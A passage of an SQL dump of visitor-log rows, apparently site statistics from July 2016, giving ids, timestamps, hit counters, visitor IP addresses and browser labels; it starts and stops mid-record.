099268,1,1,0,0,'213.227.209.138','chrome'),(50461,1469099279,1,1,0,0,'91.196.178.72','chrome'),(50462,1469099289,1,0,1,0,'66.249.66.177',''),(50463,1469099294,1,1,0,0,'37.55.226.193','other'),(50464,1469099300,2,2,0,0,'66.249.93.109','chrome'),(50465,1469099324,1,0,1,0,'66.249.66.185',''),(50466,1469099344,1,1,0,0,'95.133.193.81','chrome'),(50467,1469099425,1,1,0,0,'91.196.178.100','other'),(50468,1469099458,1,1,0,0,'37.54.16.65','chrome'),(50469,1469099467,1,1,0,0,'141.0.15.10','other'),(50470,1469099474,1,1,0,0,'37.73.214.69','other'),(50471,1469099526,1,1,0,0,'91.196.178.129','chrome'),(50472,1469099530,1,1,0,0,'91.196.178.39','other'),(50473,1469099539,1,1,0,0,'37.53.226.64','chrome'),(50474,1469099546,1,1,0,0,'37.73.253.46','chrome'),(50475,1469099607,1,1,0,0,'37.73.199.13','other'),(50476,1469099668,1,1,0,0,'91.196.178.33','chrome'),(50477,1469099684,1,1,0,0,'168.235.206.199','other'),(50478,1469099699,1,1,0,0,'46.133.165.24','chrome'),(50479,1469099878,1,1,0,0,'91.196.178.70','chrome'),(50480,1469099887,1,1,0,0,'141.0.15.123','other'),(50481,1469099894,1,1,0,0,'91.196.178.168','firefox'),(50482,1469099910,1,1,0,0,'91.196.178.166','chrome'),(50483,1469099974,1,1,0,0,'91.196.178.37','chrome'),(50484,1469099980,1,1,0,0,'91.196.178.101','firefox'),(50485,1469099993,1,1,0,0,'78.111.189.90','chrome'),(50486,1469100041,1,1,0,0,'178.92.8.52','chrome'),(50487,1469100060,1,1,0,0,'91.196.177.61','chrome'),(50488,1469100084,1,1,0,0,'82.145.222.70','chrome'),(50489,1469100085,1,1,0,0,'37.53.228.197','firefox'),(50490,1469100090,1,1,0,0,'94.179.85.158','firefox'),(50491,1469100124,1,1,0,0,'51.255.65.24','other'),(50492,1469100139,1,1,0,0,'91.196.178.70','firefox'),(50493,1469100140,1,1,0,0,'94.179.4.97','chrome'),(50494,1469100167,1,1,0,0,'130.180.212.62','chrome'),(50495,1469100176,1,1,0,0,'37.52.18.173','chrome'),(50496,1469100179,1,1,0,0,'37.54.22.76','chrome'),(50497,1469100191,1,1,0,0,'178.54.121.253','chrome'),(50498,1469100197,1,1,0,0,'46.211.67.66','chrome'),(50499,1469100220,1,1,0,0,'141.0.14.10','other'),(50500,1469100224,1,1,0,0,'37.52.23.197','other'),(50501,1469100259,1,1,0,0,'91.196.178.39','chrome'),(50502,1469100260,1,1,0,0,'94.178.6.107','chrome'),(50503,1469100286,1,1,0,0,'37.73.229.59','firefox'),(50504,1469100290,1,1,0,0,'91.222.80.18','chrome'),(50505,1469100305,2,2,0,0,'91.196.178.161','chrome'),(50506,1469100308,1,1,0,0,'91.196.178.166','firefox'),(50507,1469100315,1,1,0,0,'213.160.158.86','chrome'),(50508,1469100370,1,1,0,0,'37.52.115.102','chrome'),(50509,1469100371,1,1,0,0,'46.211.3.186','chrome'),(50510,1469100379,1,1,0,0,'130.180.217.211','chrome'),(50511,1469100399,1,1,0,0,'91.196.178.130','chrome'),(50512,1469100453,1,1,0,0,'94.179.11.82','chrome'),(50513,1469100475,1,1,0,0,'78.111.185.63','chrome'),(50514,1469100549,1,1,0,0,'217.20.164.81','firefox'),(50515,1469100576,1,1,0,0,'46.201.174.209','chrome'),(50516,1469100591,1,1,0,0,'141.0.14.207','other'),(50517,1469100717,1,1,0,0,'37.54.20.55','chrome'),(50518,1469100763,1,1,0,0,'8.37.233.69','other'),(50519,1469100786,1,1,0,0,'37.73.250.102','other'),(50520,1469100797,1,1,0,0,'91.196.178.98','chrome'),(50521,1469100836,1,1,0,0,'5.102.195.5','chrome'),(50522,1469100905,1,1,0,0,'188.231.253.236','chrome'),(50523,1469100930,1,1,0,0,'91.196.178.67','firefox'),(50524,1469100948,1,1,0,0,'94.179.112.4','other'),(50525,1469101181,1,1,0,0,'95.133.238.124','chrome'),(50526,1469101187,1,1,0,0,'130.180.212.63','chrome'),(50527,1469101262,2,2,0,0,'208.115.113.82','other'),(50528,1469101265,1,1,0,0,'95.134.169.69','chrome'),(50529,1469101307,1,1,0,0,'157.55.39.144','other'),(50530,1469101329,1,1,0,0,'37.52.23.197','other'),(50531,1469101352,1,1,0,0,'46.211.0.254','chrome'),(50532,1469101357,1,1,0,0,'46.219.252.223','other'),(50534,1469101360,1,1,0,0,'94.179.11.82','chrome'),(50535,1469101363,1,1,0,0,'130.180.217.211','chrome'),(50536,1469101408,1,0,1,0,'66.249.66.183',''),(50537,1469101423,1,1,0,0,'141.0.14.188','other'),(50538,1469101466,1,1,0,0,'37.53.87.212','chrome'),(50539,1469101501,1,1,0,0,'91.196.178.100','chrome'),(50540,1469101542,1,1,0,0,'37.53.229.16','opera'),(50541,1469101579,1,1,0,0,'37.73.235.94','chrome'),(50542,1469101601,1,1,0,0,'91.196.178.133','chrome'),(50543,1469101614,2,2,0,0,'91.196.178.39','other'),(50544,1469101619,1,1,0,0,'37.73.199.253','other'),(50545,1469101621,1,1,0,0,'95.135.89.121','other'),(50546,1469101682,1,1,0,0,'37.55.226.193','other'),(50547,1469101696,1,1,0,0,'141.0.15.123','other'),(50548,1469101707,1,1,0,0,'91.196.178.164','chrome'),(50549,1469101723,1,1,0,0,'91.196.178.98','other'),(50550,1469101752,1,1,0,0,'66.249.93.113','chrome'),(50551,1469101823,1,1,0,0,'37.73.249.242','chrome'),(50552,1469101831,1,1,0,0,'91.196.178.68','other'),(50553,1469101862,1,1,0,0,'180.76.15.153','other'),(50554,1469101873,1,1,0,0,'141.0.15.111','other'),(50555,1469101879,1,1,0,0,'91.196.178.104','chrome'),(50556,1469101881,1,1,0,0,'37.73.223.249','chrome'),(50557,1469101883,1,1,0,0,'141.0.14.91','other'),(50558,1469101983,1,1,0,0,'91.196.177.63','chrome'),(50559,1469102016,1,1,0,0,'37.73.199.242','chrome'),(50560,1469102044,2,2,0,0,'46.201.239.218','firefox'),(50561,1469102053,1,1,0,0,'91.196.178.98','chrome'),(50562,1469102119,1,1,0,0,'37.73.236.38','chrome'),(50563,1469102161,1,1,0,0,'37.52.19.128','chrome'),(50564,1469102232,1,1,0,0,'91.196.178.67','other'),(50565,1469102246,1,1,0,0,'37.73.221.149','chrome'),(50566,1469102266,1,1,0,0,'91.196.178.35','chrome'),(50567,1469102272,1,1,0,0,'141.0.15.31','other'),(50568,1469102286,1,1,0,0,'91.196.178.68','chrome'),(50569,1469102352,1,1,0,0,'91.196.178.71','chrome'),(50570,1469102355,1,1,0,0,'91.196.178.130','chrome'),(50571,1469102364,1,1,0,0,'91.196.178.70','chrome'),(50572,1469102368,1,1,0,0,'94.179.58.37','chrome'),(50573,1469102374,1,1,0,0,'91.225.165.26','other'),(50574,1469102402,1,1,0,0,'37.73.236.122','chrome'),(50575,1469102442,1,1,0,0,'91.196.178.163','other'),(50576,1469102458,1,1,0,0,'109.237.81.69','firefox'),(50577,1469102466,2,2,0,0,'91.196.178.132','chrome'),(50578,1469102489,1,1,0,0,'91.196.178.136','chrome'),(50580,1469102565,1,1,0,0,'37.73.247.80','other'),(50581,1469102590,1,0,1,0,'66.249.66.180',''),(50582,1469102601,1,1,0,0,'91.196.178.66','chrome'),(50583,1469102663,1,1,0,0,'91.196.178.161','other'),(50584,1469102693,1,1,0,0,'91.196.178.166','chrome'),(50585,1469102704,1,1,0,0,'178.95.244.126','chrome'),(50586,1469102705,1,1,0,0,'82.145.211.136','other'),(50587,1469102710,1,1,0,0,'141.0.15.173','other'),(50588,1469102711,1,1,0,0,'178.92.171.155','chrome'),(50589,1469102718,1,1,0,0,'95.135.212.10','other'),(50590,1469102730,1,1,0,0,'91.196.178.34','other'),(50591,1469102755,1,1,0,0,'91.196.178.33','other'),(50592,1469102798,1,1,0,0,'37.73.244.210','chrome'),(50593,1469102803,2,2,0,0,'94.179.11.63','chrome'),(50594,1469102851,2,2,0,0,'37.55.56.167','chrome'),(50596,1469102854,1,1,0,0,'176.37.254.79','chrome'),(50597,1469102909,1,1,0,0,'46.211.7.38','chrome'),(50598,1469102950,1,1,0,0,'94.179.49.191','chrome'),(50599,1469102962,1,1,0,0,'176.37.130.51','chrome'),(50600,1469102971,1,1,0,0,'37.53.93.189','chrome'),(50601,1469102974,1,1,0,0,'37.52.22.126','chrome'),(50602,1469103002,1,1,0,0,'141.0.15.158','other'),(50603,1469103096,1,1,0,0,'94.179.209.83','chrome'),(50604,1469103171,1,1,0,0,'178.93.148.82','chrome'),(50605,1469103234,1,1,0,0,'37.52.19.86','other'),(50606,1469103308,1,1,0,0,'178.95.244.45','other'),(50607,1469103314,1,1,0,0,'91.196.178.99','chrome'),(50608,1469103396,1,1,0,0,'37.73.230.44','chrome'),(50610,1469103421,1,1,0,0,'91.196.178.39','chrome'),(50611,1469103511,1,1,0,0,'94.178.146.14','chrome'),(50612,1469103552,1,1,0,0,'46.211.154.79','other'),(50613,1469103567,1,1,0,0,'91.204.180.203','other'),(50614,1469103591,1,1,0,0,'91.196.178.136','chrome'),(50615,1469103609,1,1,0,0,'91.196.178.97','chrome'),(50616,1469103623,1,1,0,0,'46.133.107.121','chrome'),(50617,1469103642,1,1,0,0,'91.196.178.163','opera'),(50618,1469103678,1,1,0,0,'178.95.244.193','firefox'),(50619,1469103679,2,2,0,0,'91.196.178.69','chrome'),(50620,1469103696,1,1,0,0,'91.196.178.169','firefox'),(50621,1469103705,1,1,0,0,'91.196.178.166','chrome'),(50622,1469103733,1,1,0,0,'208.115.113.82','other'),(50623,1469103768,1,1,0,0,'141.0.14.36','other'),(50624,1469103770,1,1,0,0,'82.145.210.180','other'),(50625,1469103882,1,1,0,0,'46.133.65.195','other'),(50626,1469103887,1,1,0,0,'92.113.156.70','chrome'),(50627,1469103899,1,1,0,0,'95.134.202.51','chrome'),(50628,1469103903,1,1,0,0,'91.196.178.100','chrome'),(50629,1469103911,1,1,0,0,'95.133.238.118','other'),(50630,1469103938,1,1,0,0,'37.73.212.199','other'),(50631,1469103948,1,1,0,0,'91.124.12.169','chrome'),(50632,1469104037,1,1,0,0,'82.145.216.125','other'),(50633,1469104047,3,3,0,0,'91.196.178.162','chrome'),(50634,1469104080,1,1,0,0,'195.64.225.92','chrome'),(50635,1469104130,1,1,0,0,'37.55.225.19','chrome'),(50636,1469104147,1,1,0,0,'91.196.178.168','firefox'),(50637,1469104159,1,1,0,0,'213.160.150.181','chrome'),(50638,1469104198,1,1,0,0,'91.196.177.26','chrome'),(50639,1469104229,1,1,0,0,'91.196.178.131','chrome'),(50640,1469104280,1,1,0,0,'82.145.219.115','other'),(50641,1469104337,1,1,0,0,'91.196.178.133','chrome'),(50642,1469104356,1,1,0,0,'94.179.54.166','chrome'),(50643,1469104390,1,1,0,0,'94.179.58.37','chrome'),(50644,1469104447,1,1,0,0,'91.196.178.67','chrome'),(50645,1469104483,1,1,0,0,'178.95.246.224','chrome'),(50646,1469104512,2,2,0,0,'46.201.239.218','firefox'),(50647,1469104513,1,1,0,0,'193.187.79.20','chrome'),(50648,1469104516,1,1,0,0,'95.134.203.157','chrome'),(50649,1469104633,2,2,0,0,'91.196.178.34','chrome'),(50650,1469104680,1,1,0,0,'46.211.156.206','chrome'),(50651,1469104693,1,1,0,0,'91.196.178.68','chrome'),(50652,1469104822,1,1,0,0,'37.73.215.85','chrome'),(50653,1469104832,1,1,0,0,'78.111.190.214','chrome'),(50654,1469104834,1,1,0,0,'193.105.124.46','firefox'),(50655,1469104923,1,1,0,0,'91.196.179.65','chrome'),(50656,1469104955,1,1,0,0,'94.179.12.15','chrome'),(50657,1469105085,1,1,0,0,'37.73.195.42','chrome'),(50658,1469105088,1,0,1,0,'66.249.69.149',''),(50659,1469105103,1,1,0,0,'91.196.178.99','firefox'),(50660,1469105127,1,0,1,0,'66.249.66.188',''),(50661,1469105199,1,1,0,0,'37.54.37.218','chrome'),(50662,1469105204,1,1,0,0,'91.196.178.100','chrome'),(50663,1469105316,1,1,0,0,'46.201.62.186','chrome'),(50664,1469105318,1,1,0,0,'91.196.177.131','chrome'),(50665,1469105349,1,1,0,0,'66.249.93.117','chrome'),(50666,1469105400,1,1,0,0,'37.73.198.84','chrome'),(50667,1469105566,1,1,0,0,'130.180.212.230','chrome'),(50668,1469105572,1,1,0,0,'178.92.248.98','chrome'),(50669,1469105636,1,1,0,0,'82.145.209.211','other'),(50670,1469105656,1,1,0,0,'91.196.177.96','chrome'),(50671,1469105768,1,1,0,0,'91.196.178.166','chrome'),(50672,1469105782,1,1,0,0,'157.55.39.144','other'),(50673,1469105832,1,1,0,0,'91.196.178.67','chrome'),(50674,1469105893,1,1,0,0,'46.133.189.215','chrome'),(50675,1469105937,1,1,0,0,'37.53.110.49','chrome'),(50676,1469106055,1,1,0,0,'46.133.65.195','other'),(50677,1469106068,1,1,0,0,'141.0.15.24','other'),(50678,1469106105,1,1,0,0,'46.211.205.104','chrome'),(50679,1469106179,1,1,0,0,'37.73.213.215','other'),(50680,1469106253,1,1,0,0,'95.213.218.89','other'),(50681,1469106264,1,1,0,0,'37.55.58.166','other'),(50682,1469106314,1,1,0,0,'91.196.177.8','chrome'),(50683,1469106347,1,1,0,0,'94.179.102.207','other'),(50684,1469106506,1,1,0,0,'194.44.141.63','chrome'),(50685,1469106575,1,1,0,0,'94.179.247.73','other'),(50686,1469106626,1,1,0,0,'37.73.238.242','chrome'),(50687,1469106657,1,1,0,0,'91.196.178.71','chrome'),(50688,1469106686,1,1,0,0,'37.55.226.77','chrome'),(50689,1469106687,1,1,0,0,'94.179.56.252','chrome'),(50690,1469106765,1,1,0,0,'94.179.22.167','chrome'),(50691,1469106766,1,1,0,0,'95.135.212.224','chrome'),(50692,1469106770,1,1,0,0,'82.207.91.234','firefox'),(50693,1469106777,1,1,0,0,'141.0.15.150','other'),(50694,1469106861,1,1,0,0,'66.249.93.109','chrome'),(50695,1469106899,1,1,0,0,'141.0.15.66','other'),(50696,1469106907,1,1,0,0,'92.112.104.210','chrome'),(50697,1469106944,1,1,0,0,'5.255.253.68','other'),(50698,1469106980,1,1,0,0,'91.196.178.135','chrome'),(50699,1469106984,2,2,0,0,'101.226.33.208','other'),(50700,1469106987,2,2,0,0,'180.153.206.37','chrome'),(50701,1469106989,1,1,0,0,'180.153.201.216','chrome'),(50702,1469106993,1,1,0,0,'95.133.150.255','other'),(50703,1469107002,2,2,0,0,'91.196.178.72','chrome'),(50704,1469107135,1,1,0,0,'194.44.89.149','chrome'),(50705,1469107136,1,1,0,0,'91.196.177.20','chrome'),(50706,1469107138,1,1,0,0,'37.77.135.2','firefox'),(50707,1469107160,1,1,0,0,'46.211.113.56','chrome'),(50708,1469107187,1,1,0,0,'101.226.89.122','chrome'),(50709,1469107188,3,3,0,0,'180.153.214.188','other'),(50710,1469107215,1,1,0,0,'37.73.219.230','chrome'),(50712,1469107318,1,1,0,0,'94.179.59.210','firefox'),(50713,1469107359,1,1,0,0,'94.179.88.97','chrome'),(50714,1469107383,1,1,0,0,'46.211.6.121','chrome'),(50715,1469107385,1,1,0,0,'141.0.14.104','other'),(50716,1469107401,1,1,0,0,'141.8.142.85','other'),(50717,1469107458,1,1,0,0,'141.0.14.228','other'),(50718,1469107502,1,1,0,0,'91.196.177.62','chrome'),(50719,1469107509,1,1,0,0,'130.193.51.14','other'),(50720,1469107521,1,1,0,0,'91.124.183.181','other'),(50721,1469107594,1,1,0,0,'130.193.37.7','other'),(50722,1469107646,1,1,0,0,'82.145.209.98','other'),(50723,1469107675,1,1,0,0,'178.154.189.31','other'),(50724,1469107688,1,1,0,0,'37.55.251.69','chrome'),(50725,1469107755,1,1,0,0,'94.179.109.18','firefox'),(50726,1469107763,1,1,0,0,'141.8.183.25','other'),(50727,1469107796,1,1,0,0,'176.105.211.11','chrome'),(50728,1469107817,1,1,0,0,'91.196.178.70','firefox'),(50729,1469107860,1,1,0,0,'130.193.51.74','other'),(50730,1469107962,1,1,0,0,'91.196.178.99','other'),(50731,1469107977,1,1,0,0,'91.196.178.162','other'),(50732,1469107998,1,1,0,0,'91.196.178.163','chrome'),(50733,1469108014,1,1,0,0,'91.196.178.161','chrome'),(50734,1469108045,1,1,0,0,'46.211.5.12','chrome'),(50735,1469108070,1,1,0,0,'178.154.149.11','other'),(50736,1469108083,1,1,0,0,'91.196.178.103','chrome'),(50737,1469108191,1,1,0,0,'37.73.228.9','other'),(50738,1469108192,1,1,0,0,'37.73.211.176','chrome'),(50739,1469108229,1,1,0,0,'37.73.243.250','chrome'),(50740,1469108238,1,1,0,0,'93.158.152.84','other'),(50741,1469108293,1,1,0,0,'37.53.111.246','other'),(50742,1469108364,1,1,0,0,'141.8.142.85','other'),(50743,1469108367,1,1,0,0,'130.193.37.27','other'),(50744,1469108417,1,1,0,0,'37.73.210.28','chrome'),(50745,1469108428,2,2,0,0,'91.227.69.211','firefox'),(50746,1469108447,1,1,0,0,'91.196.178.164','other'),(50747,1469108476,1,1,0,0,'91.196.178.136','chrome'),(50748,1469108493,1,1,0,0,'130.193.50.6','other'),(50749,1469108543,1,1,0,0,'141.0.15.171','other'),(50750,1469108554,1,1,0,0,'91.196.178.34','chrome'),(50751,1469108557,1,1,0,0,'94.179.56.178','chrome'),(50752,1469108560,1,1,0,0,'37.73.194.47','chrome'),(50753,1469108577,1,1,0,0,'37.73.199.151','chrome'),(50754,1469108596,1,1,0,0,'94.179.52.112','chrome'),(50755,1469108621,1,1,0,0,'93.158.152.75','other'),(50756,1469108653,1,1,0,0,'37.73.198.41','other'),(50757,1469108658,1,1,0,0,'82.145.211.35','other'),(50758,1469108660,1,1,0,0,'141.0.14.206','other'),(50759,1469108670,1,1,0,0,'130.193.50.4','other'),(50760,1469108715,2,2,0,0,'91.196.178.67','chrome'),(50761,1469108744,1,1,0,0,'93.158.152.40','other'),(50762,1469108792,1,1,0,0,'130.193.50.38','other'),(50763,1469108841,1,1,0,0,'82.145.217.96','other'),(50764,1469108857,1,1,0,0,'95.134.233.189','firefox'),(50765,1469108869,1,1,0,0,'93.158.152.61','other'),(50766,1469108871,2,2,0,0,'141.8.142.78','other'),(50767,1469108884,1,1,0,0,'91.196.178.133','chrome'),(50768,1469108913,1,1,0,0,'130.193.50.34','other'),(50769,1469108925,1,1,0,0,'91.196.178.39','chrome'),(50770,1469108946,1,1,0,0,'91.196.178.38','chrome'),(50771,1469109007,1,1,0,0,'37.54.17.141','chrome'),(50772,1469109019,1,1,0,0,'91.196.178.38','firefox'),(50773,1469109041,1,1,0,0,'141.8.142.88','other'),(50774,1469109048,1,1,0,0,'93.72.8.45','other'),(50775,1469109123,1,1,0,0,'5.255.253.47','other'),(50776,1469109170,1,1,0,0,'91.196.178.97','chrome'),(50777,1469109172,1,1,0,0,'141.8.132.30','other'),(50778,1469109200,1,1,0,0,'77.91.171.197','chrome'),(50779,1469109223,1,1,0,0,'37.73.254.239','chrome'),(50780,1469109232,1,1,0,0,'78.111.189.196','chrome'),(50781,1469109267,1,1,0,0,'178.92.249.177','chrome'),(50782,1469109299,1,1,0,0,'37.55.58.163','chrome'),(50783,1469109301,1,1,0,0,'130.193.51.79','other'),(50784,1469109319,1,1,0,0,'37.73.213.47','other'),(50785,1469109346,1,1,0,0,'176.36.124.214','chrome'),(50786,1469109408,1,1,0,0,'46.201.175.64','chrome'),(50787,1469109413,1,1,0,0,'46.133.187.1','other'),(50788,1469109421,1,1,0,0,'91.196.178.36','chrome'),(50789,1469109465,1,1,0,0,'37.73.227.30','chrome'),(50790,1469109485,1,1,0,0,'91.196.178.72','chrome'),(50791,1469109511,1,1,0,0,'91.196.178.35','chrome'),(50792,1469109556,1,1,0,0,'95.133.238.31','chrome'),(50793,1469109592,1,1,0,0,'91.124.183.181','other'),(50794,1469109608,1,1,0,0,'91.196.178.100','chrome'),(50795,1469109612,1,1,0,0,'46.211.155.85','chrome'),(50796,1469109656,1,1,0,0,'82.145.219.118','other'),(50797,1469109720,1,1,0,0,'94.179.50.252','chrome'),(50798,1469109783,1,1,0,0,'94.179.77.156','chrome'),(50799,1469109800,1,1,0,0,'91.196.178.99','chrome'),(50800,1469109806,1,1,0,0,'82.145.211.222','other'),(50801,1469109882,1,1,0,0,'37.53.226.70','chrome'),(50802,1469109977,1,1,0,0,'91.196.177.93','chrome'),(50803,1469110069,1,1,0,0,'91.196.178.68','other'),(50804,1469110119,1,1,0,0,'37.73.198.228','chrome'),(50805,1469110229,1,1,0,0,'91.196.178.69','other'),(50806,1469110245,1,1,0,0,'178.95.244.194','other'),(50807,1469110341,1,1,0,0,'91.196.178.39','firefox'),(50808,1469110345,1,1,0,0,'95.133.193.36','other'),(50809,1469110446,1,1,0,0,'91.196.178.135','firefox'),(50810,1469110550,1,1,0,0,'91.196.178.72','chrome'),(50811,1469110590,1,1,0,0,'91.233.49.253','chrome'),(50812,1469110746,1,1,0,0,'91.196.178.168','chrome'),(50813,1469110919,1,1,0,0,'91.196.178.164','other'),(50814,1469110959,1,1,0,0,'37.73.242.162','chrome'),(50815,1469110997,1,1,0,0,'178.92.248.152','other'),(50816,1469111045,1,1,0,0,'168.235.206.29','other'),(50817,1469111135,7,7,0,0,'178.6.246.231','other'),(50818,1469111208,1,1,0,0,'91.196.178.67','chrome'),(50819,1469111212,1,1,0,0,'95.134.221.25','chrome'),(50820,1469111222,1,1,0,0,'95.133.193.197','chrome'),(50821,1469111243,1,1,0,0,'37.73.220.67','chrome'),(50822,1469111270,1,1,0,0,'141.0.14.201','other'),(50823,1469111291,1,1,0,0,'91.196.178.104','chrome'),(50824,1469111327,1,1,0,0,'82.145.219.155','other'),(50825,1469111351,1,0,1,0,'66.249.78.136',''),(50826,1469111419,1,1,0,0,'91.196.178.103','chrome'),(50827,1469111520,1,1,0,0,'213.108.41.140','chrome'),(50828,1469111536,1,1,0,0,'8.37.230.185','other'),(50829,1469111721,1,1,0,0,'91.196.178.68','other'),(50830,1469111783,1,1,0,0,'94.179.108.150','chrome'),(50831,1469112142,1,1,0,0,'91.196.178.71','chrome'),(50832,1469112162,1,1,0,0,'130.180.210.33','firefox'),(50833,1469112204,1,1,0,0,'37.55.56.167','chrome'),(50834,1469112211,1,1,0,0,'178.92.8.227','firefox'),(50835,1469112213,1,1,0,0,'37.73.236.150','chrome'),(50836,1469112241,1,1,0,0,'212.55.75.197','chrome'),(50837,1469112269,1,1,0,0,'82.145.220.36','chrome'),(50838,1469112324,1,1,0,0,'91.196.178.133','chrome'),(50839,1469112443,1,1,0,0,'46.211.0.248','chrome'),(50840,1469112471,1,1,0,0,'82.145.208.72','other'),(50841,1469112508,1,1,0,0,'95.134.117.123','chrome'),(50842,1469112524,1,1,0,0,'46.201.240.112','chrome'),(50843,1469112554,1,1,0,0,'95.135.241.58','chrome'),(50844,1469112638,1,1,0,0,'37.73.241.240','other'),(50845,1469112719,1,1,0,0,'46.133.49.39','chrome'),(50846,1469112908,2,0,2,0,'66.249.78.150',''),(50847,1469112962,1,1,0,0,'66.249.93.113','chrome'),(50848,1469113058,1,1,0,0,'193.227.207.46','other'),(50849,1469113062,1,1,0,0,'91.196.178.97','chrome'),(50850,1469113069,1,1,0,0,'82.145.211.178','other'),(50851,1469113245,1,1,0,0,'176.104.0.134','other'),(50852,1469113378,1,1,0,0,'91.196.178.165','chrome'),(50853,1469113725,1,1,0,0,'95.133.150.166','chrome'),(50854,1469113790,1,1,0,0,'66.249.93.117','chrome'),(50855,1469113834,1,1,0,0,'91.196.178.102','chrome'),(50856,1469113999,1,1,0,0,'37.73.229.160','chrome'),(50857,1469114131,1,1,0,0,'46.211.67.95','other'),(50858,1469114134,1,1,0,0,'37.73.208.144','chrome'),(50859,1469114176,1,1,0,0,'46.211.155.216','chrome'),(50860,1469114210,1,1,0,0,'91.196.178.34','chrome'),(50861,1469114211,1,1,0,0,'37.73.252.63','other'),(50862,1469114369,1,1,0,0,'94.179.8.170','chrome'),(50863,1469114451,2,0,2,0,'66.249.78.143',''),(50864,1469114479,1,1,0,0,'77.121.126.193','chrome'),(50865,1469114480,1,1,0,0,'91.196.178.66','firefox'),(50866,1469114622,1,1,0,0,'141.0.14.201','other'),(50867,1469114636,1,1,0,0,'195.66.141.103','chrome'),(50868,1469114667,1,1,0,0,'91.196.178.167','firefox'),(50869,1469114747,1,1,0,0,'188.163.11.234','chrome'),(50870,1469114797,1,1,0,0,'91.196.178.35','chrome'),(50871,1469114848,1,0,1,0,'66.249.78.178',''),(50872,1469114876,1,1,0,0,'91.196.178.97','chrome'),(50873,1469114883,1,1,0,0,'157.55.39.144','other'),(50874,1469114946,1,1,0,0,'94.179.247.224','chrome'),(50875,1469114951,1,1,0,0,'95.135.212.14','other'),(50876,1469115066,1,1,0,0,'37.55.58.163','chrome'),(50877,1469115258,2,0,2,0,'66.249.78.136',''),(50878,1469115293,1,1,0,0,'91.196.178.65','chrome'),(50879,1469115296,1,1,0,0,'91.196.178.97','other'),(50880,1469115351,1,1,0,0,'8.37.225.244','other'),(50881,1469115359,1,1,0,0,'37.73.193.143','other'),(50882,1469115367,1,1,0,0,'37.53.89.22','other'),(50883,1469115422,1,1,0,0,'178.95.158.222','chrome'),(50884,1469115548,1,1,0,0,'37.73.254.55','chrome'),(50885,1469115642,1,1,0,0,'141.0.14.82','other'),(50886,1469115690,1,1,0,0,'91.196.178.98','other'),(50887,1469115715,1,1,0,0,'37.53.111.225','chrome'),(50888,1469115870,2,2,0,0,'91.196.178.131','other'),(50889,1469115923,1,1,0,0,'46.174.123.231','chrome'),(50890,1469115986,2,0,2,0,'66.249.78.150',''),(50891,1469116031,1,1,0,0,'91.233.110.2','chrome'),(50892,1469116035,1,1,0,0,'91.196.178.66','other'),(50893,1469116062,1,1,0,0,'130.180.218.79','chrome'),(50894,1469116065,1,1,0,0,'95.133.238.123','chrome'),(50895,1469116217,1,1,0,0,'91.196.178.35','chrome'),(50896,1469116245,1,1,0,0,'8.37.235.130','other'),(50897,1469116347,1,1,0,0,'37.54.21.90','chrome'),(50898,1469116367,1,1,0,0,'94.179.11.42','chrome'),(50899,1469116445,1,1,0,0,'37.73.196.173','chrome'),(50900,1469116458,1,1,0,0,'8.37.234.113','other'),(50901,1469116515,1,1,0,0,'178.92.248.152','chrome'),(50902,1469116624,2,0,2,0,'66.249.78.143',''),(50903,1469116707,1,1,0,0,'91.124.238.180','chrome'),(50904,1469116779,1,1,0,0,'91.196.178.38','other'),(50905,1469116896,1,1,0,0,'82.145.218.110','other'),(50906,1469116928,1,1,0,0,'94.178.6.61','chrome'),(50907,1469116971,1,1,0,0,'46.149.84.148','chrome'),(50908,1469116974,3,3,0,0,'91.196.178.100','chrome'),(50909,1469116975,1,1,0,0,'37.73.225.251','chrome'),(50910,1469116992,1,1,0,0,'37.73.192.165','other'),(50911,1469117048,1,0,1,0,'66.249.78.171',''),(50912,1469117076,1,1,0,0,'37.52.23.43','chrome'),(50913,1469117109,1,1,0,0,'95.135.212.224','chrome'),(50914,1469117180,1,1,0,0,'91.196.178.103','other'),(50915,1469117247,1,1,0,0,'91.124.119.147','chrome'),(50916,1469117261,1,1,0,0,'130.180.211.153','chrome'),(50917,1469117272,1,1,0,0,'178.92.8.153','chrome'),(50918,1469117358,1,1,0,0,'46.174.123.231','chrome'),(50919,1469117365,1,1,0,0,'91.196.178.135','firefox'),(50920,1469117371,1,0,1,0,'66.249.78.136',''),(50921,1469117535,1,1,0,0,'95.133.193.245','chrome'),(50922,1469117560,1,1,0,0,'178.158.216.74','other'),(50923,1469117598,1,1,0,0,'91.196.178.102','other'),(50924,1469117620,1,1,0,0,'77.121.167.239','chrome'),(50925,1469117676,1,1,0,0,'91.196.178.38','firefox'),(50926,1469117696,1,1,0,0,'193.107.226.170','chrome'),(50927,1469117730,1,1,0,0,'46.211.253.181','chrome'),(50928,1469117816,1,1,0,0,'91.196.178.102','firefox'),(50929,1469117851,1,1,0,0,'91.196.178.164','chrome'),(50930,1469117902,1,1,0,0,'91.124.238.85','chrome'),(50931,1469117967,1,1,0,0,'91.196.178.65','firefox'),(50932,1469117982,1,1,0,0,'37.73.232.184','other'),(50933,1469118076,1,1,0,0,'37.73.245.44','other'),(50934,1469118137,1,1,0,0,'91.196.178.133','chrome'),(50935,1469118223,1,1,0,0,'178.92.8.79','chrome'),(50936,1469118403,1,1,0,0,'185.11.29.185','other'),(50937,1469118446,1,1,0,0,'81.23.24.134','chrome'),(50938,1469118506,1,1,0,0,'91.196.178.72','firefox'),(50939,1469118510,1,1,0,0,'81.23.24.136','chrome'),(50940,1469118703,1,0,1,0,'66.249.78.171',''),(50941,1469118727,1,1,0,0,'91.196.178.69','chrome'),(50942,1469118734,1,0,1,0,'66.249.78.164',''),(50943,1469118739,1,0,1,0,'66.249.78.136',''),(50944,1469119002,1,1,0,0,'94.179.105.89','chrome'),(50945,1469119029,1,1,0,0,'178.93.148.102','chrome'),(50946,1469119116,1,1,0,0,'95.132.181.28','other'),(50947,1469119122,1,1,0,0,'91.196.178.34','chrome'),(50948,1469119137,1,1,0,0,'178.93.84.136','chrome'),(50949,1469119153,1,1,0,0,'37.73.225.10','chrome'),(50950,1469119271,1,1,0,0,'193.33.65.75','chrome'),(50951,1469119434,1,1,0,0,'91.124.182.219','other'),(50952,1469119513,1,1,0,0,'141.0.14.50','other'),(50953,1469119516,1,1,0,0,'141.0.14.63','other'),(50954,1469119517,1,1,0,0,'141.0.14.173','other'),(50955,1469119572,1,1,0,0,'46.211.2.248','chrome'),(50956,1469119599,1,1,0,0,'37.73.229.165','other'),(50957,1469119627,1,1,0,0,'46.211.2.167','chrome'),(50958,1469119651,1,1,0,0,'91.196.178.135','chrome'),(50959,1469119687,1,1,0,0,'46.201.52.65','chrome'),(50960,1469119755,1,1,0,0,'46.211.71.63','chrome'),(5